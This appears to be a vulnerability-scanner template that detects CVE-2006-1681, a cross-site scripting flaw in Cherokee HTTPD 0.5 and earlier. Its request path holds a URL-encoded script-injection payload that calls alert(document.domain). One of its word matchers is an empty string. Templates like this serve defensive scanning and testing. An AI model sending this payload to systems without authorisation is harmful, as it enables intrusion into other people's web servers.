id: CVE-2006-1681 info: name: Cherokee HTTPD <=0.5 XSS author: geeknik severity: medium description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. reference: - https://www.securityfocus.com/bid/17408 - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 classification: cve-id: CVE-2006-1681 tags: cherokee,httpd,xss,cve,cve2006 requests: - method: GET path: - "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "" - type: word part: header words: - text/html